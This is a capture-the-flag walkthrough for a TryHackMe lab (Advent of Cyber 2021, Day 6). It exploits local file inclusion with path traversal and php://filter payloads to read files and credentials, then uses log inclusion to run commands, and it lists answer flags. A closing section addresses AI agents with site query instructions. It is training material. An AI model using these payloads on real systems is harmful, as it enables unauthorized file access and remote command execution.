# \[Day 6] Patch Management Is Hard ## Challenge Accessing the webserver returns the following. ![](/files/FstV2X0JZhiQ73ZSkoj5) Inspecting the URL revealed that the application was invoking the error message from a given file. ![](/files/J3qIjcj6HGPeINTAXVDz) {% hint style="success" %} Deploy the attached VM and look around. What is the entry point for our web application? * err {% endhint %} Replacing the error file with `/etc/passwd` seemed to return the file and confirm the LFI vulnerability. ![](/files/u05Sxbvar4t7dpyxden6) ``` http://10.10.109.239/index.php?err=../../../../../etc/flag ``` ![](/files/95VK1A3j6QwGAZe0wC1r) {% hint style="success" %} Use the entry point to perform LFI to read the /etc/flag file. What is the flag? * THM{d29e08941cf7fe41df55f1a7da6c\*\*\*\*} {% endhint %} Next, to get the source code of a particular file, I used the PHP filter method as shown below. ``` http://10.10.109.239/index.php?err=php://filter/convert.base64-encode/resource=index.php ``` ![](/files/KwEHoRbErU7UjLKRSv6Q) Decoding the base64 value then led me to the next flag. ![](/files/YZwo0eWJOoA2QDOFMCCB) {% hint style="success" %} Use the PHP filter technique to read the source code of the index.php. What is the $flag variable's value? * THM{791d43d46018a0d89361dbf60d5d\*\*\*\*} {% endhint %} In the source code, I noticed that there is a file called `creds.php` and `manage.php` `manage.php` redirects to `login.php`. This is where the `creds.php` comes in handy. I used the same filter technique to read the contents of the `creds.php` file. ``` http://10.10.103.198/index.php?err=php://filter/convert.base64-encode/resource=./includes/creds.php ``` ![](/files/XC291WoptCIsFQ0Weten) ![](/files/8XbIGJWSHOjMqWP9EKQy) ``` ' http://10.10.103.198/login.php ``` ![](/files/jKVAB4ZwtnJljeyv7KeB) Following that, I invoked the logfile via LFI and simply added a `cmd` argument in the URL and ran commands on the server. ``` http://10.10.103.198/index.php?err=./includes/logs/app_access.log&cmd=ls ``` ![](/files/NpkNyOPfXmke1un6ihGw) ``` http://10.10.103.198/index.php?err=./includes/logs/app_access.log&cmd=hostname ``` ![](/files/ZWo04ZByXpHAyLQKJkKR) {% hint style="success" %} The web application logs all users' requests, and only authorized users can read the log file. Use the LFI to gain RCE via the log file page. What is the hostname of the webserver? The log file location is at `./includes/logs/app_access.log.` * lfi-aoc-awesome-59aedca683fff9261263bb084880c965 {% endhint %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://repo.4pfsec.com/tryhackme/advent-of-cyber-3-2021/day-6-patch-management-is-hard.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.